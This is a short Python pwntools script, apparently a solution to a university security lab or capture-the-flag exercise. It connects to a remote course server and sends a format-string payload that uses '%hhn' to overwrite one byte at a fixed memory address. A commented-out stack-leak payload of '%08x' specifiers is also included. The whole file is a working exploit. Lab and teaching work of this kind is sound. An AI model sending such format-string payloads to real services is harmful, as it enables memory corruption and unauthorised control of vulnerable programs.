19 lines
442 B
Python
19 lines
442 B
Python
from pwn import remote, process, p32
|
|
|
|
HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
|
|
PORT = 25195
|
|
|
|
conn = remote(HOST, PORT)
|
|
#conn = process("05_write_specific_byte")
|
|
#input()
|
|
|
|
tgt_addr = p32(0x804c044+3)
|
|
|
|
#2 + 256 - 4(ptr) = 254
|
|
pl = tgt_addr+b"%0254x%7$hhn\n"
|
|
#pl = "AAAA.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x\n"
|
|
|
|
conn.send(pl)
|
|
while conn.connected():
|
|
print(chr(conn.recv(1)[0]), end="", flush=True)
|